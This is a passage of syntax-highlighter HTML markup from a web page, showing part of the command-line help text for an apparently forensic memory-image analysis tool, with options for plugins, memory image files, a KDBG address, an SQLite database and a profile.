<div class="crayon-line" id="crayon-5661f791a9922714708817-9" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">optional </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">arguments</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">:</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-10" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">h</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">help </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">show </span><span class="crayon-r" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">this</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">help </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">message </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">and</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">exit</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-11" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">d</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DIR </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Path </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">to</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">additional </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">plugin </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">directory</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-12" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">p</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PLUGIN</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PLUGIN</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-13" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Plugin</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">s</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">)</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">to</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">run</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">For</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">a</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">list </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">of </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">options </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">use</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">info</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-14" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">f</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILE </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Memory </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">image </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">file </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">to</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">run </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">plugin </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">on</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-15" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">k</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">KDBG </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">KDBG </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">address </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">for</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">the </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">images</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(</span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">in</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hex</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">)</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-16" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DB </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">SQLite </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">file</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">for</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">efficient </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">input</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">output</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-17" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">profile </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PROFILE </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 